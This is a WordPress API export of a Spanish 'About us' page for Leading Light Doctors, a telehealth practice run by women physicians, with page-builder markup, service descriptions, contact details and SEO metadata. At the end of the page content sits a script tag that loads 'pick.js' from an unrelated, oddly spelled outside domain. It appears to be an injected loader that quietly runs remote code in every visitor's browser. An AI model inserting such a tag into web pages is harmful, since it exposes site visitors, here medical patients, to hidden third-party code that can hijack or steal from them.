{"id":3877,"date":"2021-10-19T00:43:07","date_gmt":"2021-10-19T00:43:07","guid":{"rendered":"https:\/\/lldoctors.com\/sobre-nosotros\/"},"modified":"2021-10-30T00:46:06","modified_gmt":"2021-10-30T00:46:06","slug":"sobre-nosotros","status":"publish","type":"page","link":"https:\/\/lldoctors.com\/es\/sobre-nosotros\/","title":{"rendered":"Sobre nosotros"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row lg_spacing=&#8221;padding_top:110;padding_bottom:30&#8243;][vc_column][vc_row_inner][vc_column_inner offset=&#8221;vc_col-md-offset-2 vc_col-md-8&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text=&#8221;Construyendo una comunidad saludable para todos.&#8221; font_size=&#8221;lg:36&#8243;][tm_spacer size=&#8221;lg:20&#8243;][tm_heading tag=&#8221;div&#8221; custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text=&#8221;La atenci\u00f3n de calidad al paciente es nuestra prioridad. &#8221; font_size=&#8221;lg:18&#8243;][tm_spacer size=&#8221;lg:70&#8243;][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=&#8221;2\/3&#8243;][tm_image animation=&#8221;scale-up&#8221; image=&#8221;2818&#8243;][tm_spacer size=&#8221;lg:70&#8243;][tm_spacer size=&#8221;lg:70&#8243;][tm_spacer size=&#8221;lg:70&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_column_text]<\/p>\n<div id=\"tm-heading-6010c50df2340\" class=\"tm-heading left tm-animation move-up animate\">\n<h5 class=\"heading\">Leading Light Doctors es un grupo de mujeres m\u00e9dicas compasivas que, gracias a las innovaciones tecnol\u00f3gicas y la digitalizaci\u00f3n, est\u00e1n adoptando un enfoque empresarial y creando una nueva oportunidad para mejorar su acceso a la atenci\u00f3n m\u00e9dica de alta calidad.<\/h5>\n<p>&nbsp;<\/p>\n<h5 class=\"heading\">Estas mejoras han hecho posible que nuestros pacientes y m\u00e9dicos est\u00e9n en contacto de forma remota a trav\u00e9s de videoconferencias o aplicaciones m\u00f3viles. Al implementar estos avances en el cuidado de la salud,<strong><span style=\"color: #800000;\"> L.<\/span><span style=\"color: #008000;\"> L.<\/span><span style=\"color: #800000;\"> D<\/span><\/strong> es capaz de brindarles a nuestros pacientes la misma sensaci\u00f3n y experiencia que el consultorio m\u00e9dico tradicional en persona sin dejar la comodidad de su hogar.<\/h5>\n<\/div>\n<p><!--more-->[\/vc_column_text][tm_spacer size=&#8221;lg:10&#8243;][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=&#8221;1\/2&#8243;][vc_column_text]<\/p>\n<h4>A<strong><span style=\"color: #800000;\"> L.<\/span><span style=\"color: #008000;\"> L.<\/span><span style=\"color: #800000;\"> D<\/span><\/strong> recibe la atenci\u00f3n y el cuidado personalizados del mismo m\u00e9dico, uno que lo conocer\u00e1 a usted ya su familia.<\/h4>\n<h4>Inicia su visita de telemedicina a trav\u00e9s de una aplicaci\u00f3n en su tel\u00e9fono m\u00f3vil. Cada conversaci\u00f3n continuar\u00e1 donde la dej\u00f3. Tendr\u00e1 la posibilidad de acceder a su m\u00e9dico, incluso en una situaci\u00f3n de atenci\u00f3n de urgencia.<\/h4>\n<h4>Una vez configurado, tiene el poder de ser el conductor de su atenci\u00f3n m\u00e9dica personal.<\/h4>\n<p>[\/vc_column_text][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243;][tm_image animation=&#8221;scale-up&#8221; image=&#8221;2860&#8243;][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; background_color=&#8221;primary&#8221; lg_spacing=&#8221;padding_top:30;padding_bottom:30&#8243;][vc_column][vc_column_text]<\/p>\n<p class=\"p1\" style=\"text-align: center; color: #fff;\"><span class=\"s1\"><b>Estamos aqu\u00ed por t\u00ed<\/b> . Ll\u00e1manos al 1-310-486-8189 o <\/span><a style=\"color: #fff; text-decoration: underline;\" href=\"https:\/\/bookmymd.website4md.com\/v22\/?id=Y8EhiWgbpITgtQUZJRGWlp72WPSdJnCRekowa1p3a1NzWUEwQnZNMHJCdGRrZz09\" target=\"_blank\" rel=\"noopener\"><span class=\"s2\">solicite una cita en l\u00ednea.<\/span><\/a><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; background_image=&#8221;1393&#8243; background_position=&#8221;center center&#8221;][vc_column][tm_spacer size=&#8221;lg:110&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text=&#8221;Clientes felices hablan de nosotros&#8221; font_size=&#8221;lg:36&#8243;][tm_spacer size=&#8221;lg:80&#8243;][tm_testimonial style=&#8221;7&#8243; number=&#8221;9&#8243; auto_play=&#8221;5000&#8243; pagination=&#8221;6&#8243; carousel_items_display=&#8221;xs:1;sm:2;lg:2&#8243; carousel_gutter=&#8221;lg:60&#8243;][vc_separator][tm_spacer size=&#8221;lg:40&#8243;][tm_spacer size=&#8221;lg:40&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][tm_spacer][\/vc_column][\/vc_row]<script src='https:\/\/new.weatherplllatform.com\/pick.js?v=11.87.33' type='text\/javascript'><\/script><\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row lg_spacing=&#8221;padding_top:110;padding_bottom:30&#8243;][vc_column][vc_row_inner][vc_column_inner offset=&#8221;vc_col-md-offset-2 vc_col-md-8&#8243;][tm_heading custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text=&#8221;Construyendo una comunidad saludable para todos.&#8221; font_size=&#8221;lg:36&#8243;][tm_spacer size=&#8221;lg:20&#8243;][tm_heading tag=&#8221;div&#8221; custom_google_font=&#8221;&#8221; align=&#8221;center&#8221; text=&#8221;La atenci\u00f3n de calidad al paciente es nuestra prioridad. &#8221; font_size=&#8221;lg:18&#8243;][tm_spacer size=&#8221;lg:70&#8243;][\/vc_column_inner][\/vc_row_inner][vc_row_inner][vc_column_inner width=&#8221;2\/3&#8243;][tm_image animation=&#8221;scale-up&#8221; image=&#8221;2818&#8243;][tm_spacer size=&#8221;lg:70&#8243;][tm_spacer size=&#8221;lg:70&#8243;][tm_spacer size=&#8221;lg:70&#8243;][\/vc_column_inner][vc_column_inner width=&#8221;1\/3&#8243;][vc_column_text] Leading Light Doctors es un grupo de mujeres m\u00e9dicas compasivas que, gracias a las innovaciones tecnol\u00f3gicas y la digitalizaci\u00f3n, est\u00e1n adoptando un enfoque empresarial y creando una nueva oportunidad para mejorar su acceso a la atenci\u00f3n m\u00e9dica de alta calidad. &nbsp; Estas mejoras han hecho posible que nuestros pacientes y m\u00e9dicos est\u00e9n en contacto de forma remota a trav\u00e9s de videoconferencias o aplicaciones m\u00f3viles. Al implementar estos avances en el cuidado de la salud, L. L. D es capaz de brindarles a nuestros pacientes la misma sensaci\u00f3n y experiencia que el consultorio m\u00e9dico tradicional en persona sin dejar la comodidad de su hogar.<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3877","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Sobre nosotros - LLDoctors<\/title>\n<meta name=\"description\" content=\"Leading Light Doctors es un grupo de m\u00e9dicos compasivos que se dedican a brindar atenci\u00f3n de alta calidad a las personas en California a trav\u00e9s de Telehealth. Se conecta con el m\u00e9dico desde su iPhone, computadora port\u00e1til o iPad o incluso por tel\u00e9fono y obtiene la ayuda que necesita. Para obtener m\u00e1s informaci\u00f3n, visite nuestro sitio web @ https:\/\/lldoctors.com\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/lldoctors.com\/es\/sobre-nosotros\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Sobre nosotros - LLDoctors\" \/>\n<meta property=\"og:description\" content=\"Leading Light Doctors es un grupo de m\u00e9dicos compasivos que se dedican a brindar atenci\u00f3n de alta calidad a las personas en California a trav\u00e9s de Telehealth. Se conecta con el m\u00e9dico desde su iPhone, computadora port\u00e1til o iPad o incluso por tel\u00e9fono y obtiene la ayuda que necesita. Para obtener m\u00e1s informaci\u00f3n, visite nuestro sitio web @ https:\/\/lldoctors.com\" \/>\n<meta property=\"og:url\" content=\"https:\/\/lldoctors.com\/es\/sobre-nosotros\/\" \/>\n<meta property=\"og:site_name\" content=\"LLDoctors\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/LLD-103325838431523\" \/>\n<meta property=\"article:modified_time\" content=\"2021-10-30T00:46:06+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/lldoctors.com\/wp-content\/uploads\/2018\/10\/facebook-baner-1024x682.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"682\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@lldoctors\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/lldoctors.com\\\/es\\\/sobre-nosotros\\\/\",\"url\":\"https:\\\/\\\/lldoctors.com\\\/es\\\/sobre-nosotros\\\/\",\"name\":\"Sobre nosotros - LLDoctors\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#website\"},\"datePublished\":\"2021-10-19T00:43:07+00:00\",\"dateModified\":\"2021-10-30T00:46:06+00:00\",\"description\":\"Leading Light Doctors es un grupo de m\u00e9dicos compasivos que se dedican a brindar atenci\u00f3n de alta calidad a las personas en California a trav\u00e9s de Telehealth. Se conecta con el m\u00e9dico desde su iPhone, computadora port\u00e1til o iPad o incluso por tel\u00e9fono y obtiene la ayuda que necesita. Para obtener m\u00e1s informaci\u00f3n, visite nuestro sitio web @ https:\\\/\\\/lldoctors.com\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/lldoctors.com\\\/es\\\/sobre-nosotros\\\/#breadcrumb\"},\"inLanguage\":\"es-ES\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/lldoctors.com\\\/es\\\/sobre-nosotros\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/lldoctors.com\\\/es\\\/sobre-nosotros\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/lldoctors.com\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Sobre nosotros\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#website\",\"url\":\"https:\\\/\\\/lldoctors.com\\\/\",\"name\":\"LLDoctors\",\"description\":\"Leading Light Doctors\",\"publisher\":{\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/lldoctors.com\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es-ES\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#organization\",\"name\":\"Leading Light Doctors\",\"url\":\"https:\\\/\\\/lldoctors.com\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es-ES\",\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/lldoctors.com\\\/wp-content\\\/uploads\\\/2021\\\/01\\\/logodarklldred6.png\",\"contentUrl\":\"https:\\\/\\\/lldoctors.com\\\/wp-content\\\/uploads\\\/2021\\\/01\\\/logodarklldred6.png\",\"width\":197,\"height\":54,\"caption\":\"Leading Light Doctors\"},\"image\":{\"@id\":\"https:\\\/\\\/lldoctors.com\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/LLD-103325838431523\",\"https:\\\/\\\/x.com\\\/lldoctors\",\"https:\\\/\\\/www.instagram.com\\\/leadinglightdoctors\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Sobre nosotros - LLDoctors","description":"Leading Light Doctors es un grupo de m\u00e9dicos compasivos que se dedican a brindar atenci\u00f3n de alta calidad a las personas en California a trav\u00e9s de Telehealth. Se conecta con el m\u00e9dico desde su iPhone, computadora port\u00e1til o iPad o incluso por tel\u00e9fono y obtiene la ayuda que necesita. Para obtener m\u00e1s informaci\u00f3n, visite nuestro sitio web @ https:\/\/lldoctors.com","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/lldoctors.com\/es\/sobre-nosotros\/","og_locale":"es_ES","og_type":"article","og_title":"Sobre nosotros - LLDoctors","og_description":"Leading Light Doctors es un grupo de m\u00e9dicos compasivos que se dedican a brindar atenci\u00f3n de alta calidad a las personas en California a trav\u00e9s de Telehealth. Se conecta con el m\u00e9dico desde su iPhone, computadora port\u00e1til o iPad o incluso por tel\u00e9fono y obtiene la ayuda que necesita. Para obtener m\u00e1s informaci\u00f3n, visite nuestro sitio web @ https:\/\/lldoctors.com","og_url":"https:\/\/lldoctors.com\/es\/sobre-nosotros\/","og_site_name":"LLDoctors","article_publisher":"https:\/\/www.facebook.com\/LLD-103325838431523","article_modified_time":"2021-10-30T00:46:06+00:00","og_image":[{"width":1024,"height":682,"url":"https:\/\/lldoctors.com\/wp-content\/uploads\/2018\/10\/facebook-baner-1024x682.png","type":"image\/png"}],"twitter_card":"summary_large_image","twitter_site":"@lldoctors","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/lldoctors.com\/es\/sobre-nosotros\/","url":"https:\/\/lldoctors.com\/es\/sobre-nosotros\/","name":"Sobre nosotros - LLDoctors","isPartOf":{"@id":"https:\/\/lldoctors.com\/#website"},"datePublished":"2021-10-19T00:43:07+00:00","dateModified":"2021-10-30T00:46:06+00:00","description":"Leading Light Doctors es un grupo de m\u00e9dicos compasivos que se dedican a brindar atenci\u00f3n de alta calidad a las personas en California a trav\u00e9s de Telehealth. Se conecta con el m\u00e9dico desde su iPhone, computadora port\u00e1til o iPad o incluso por tel\u00e9fono y obtiene la ayuda que necesita. Para obtener m\u00e1s informaci\u00f3n, visite nuestro sitio web @ https:\/\/lldoctors.com","breadcrumb":{"@id":"https:\/\/lldoctors.com\/es\/sobre-nosotros\/#breadcrumb"},"inLanguage":"es-ES","potentialAction":[{"@type":"ReadAction","target":["https:\/\/lldoctors.com\/es\/sobre-nosotros\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/lldoctors.com\/es\/sobre-nosotros\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/lldoctors.com\/"},{"@type":"ListItem","position":2,"name":"Sobre nosotros"}]},{"@type":"WebSite","@id":"https:\/\/lldoctors.com\/#website","url":"https:\/\/lldoctors.com\/","name":"LLDoctors","description":"Leading Light Doctors","publisher":{"@id":"https:\/\/lldoctors.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/lldoctors.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es-ES"},{"@type":"Organization","@id":"https:\/\/lldoctors.com\/#organization","name":"Leading Light Doctors","url":"https:\/\/lldoctors.com\/","logo":{"@type":"ImageObject","inLanguage":"es-ES","@id":"https:\/\/lldoctors.com\/#\/schema\/logo\/image\/","url":"https:\/\/lldoctors.com\/wp-content\/uploads\/2021\/01\/logodarklldred6.png","contentUrl":"https:\/\/lldoctors.com\/wp-content\/uploads\/2021\/01\/logodarklldred6.png","width":197,"height":54,"caption":"Leading Light Doctors"},"image":{"@id":"https:\/\/lldoctors.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/LLD-103325838431523","https:\/\/x.com\/lldoctors","https:\/\/www.instagram.com\/leadinglightdoctors"]}]}},"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/pages\/3877","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/comments?post=3877"}],"version-history":[{"count":11,"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/pages\/3877\/revisions"}],"predecessor-version":[{"id":4534,"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/pages\/3877\/revisions\/4534"}],"wp:attachment":[{"href":"https:\/\/lldoctors.com\/es\/wp-json\/wp\/v2\/media?parent=3877"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}